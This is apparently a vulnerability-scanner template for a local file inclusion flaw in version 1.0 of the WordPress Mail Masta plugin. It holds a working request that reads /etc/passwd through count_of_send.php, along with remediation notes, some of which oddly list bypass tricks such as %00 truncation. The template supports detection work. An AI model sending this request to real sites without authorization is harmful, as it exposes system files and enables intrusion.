id: Wordpress-Mail_Masta_Plugins-LFI
info:
  name: WordPress Mail Masta Plugin 1.0 local file contains vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Mail Masta ‘count_of_send.php’ local file contains vulnerability
    WordPress is a blogging platform developed by the WordPress Software Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.

    A local file inclusion vulnerability exists in version 1.0 of the WordPress Mail Masta plugin. The vulnerability results from the program not adequately sanitizing user-submitted input. An attacker could exploit this vulnerability to obtain sensitive information, execute arbitrary local scripts, and take control of applications and computers.
  reference:
  - https://www.exploit-db.com/exploits/40290/
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: status
    status:
    - 500
  - type: regex
    regex:
    - \w+:\w+:\d+:\d+:(\w+)?:[\w\d/]+:[\w\d_/]+
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd'
  method: GET
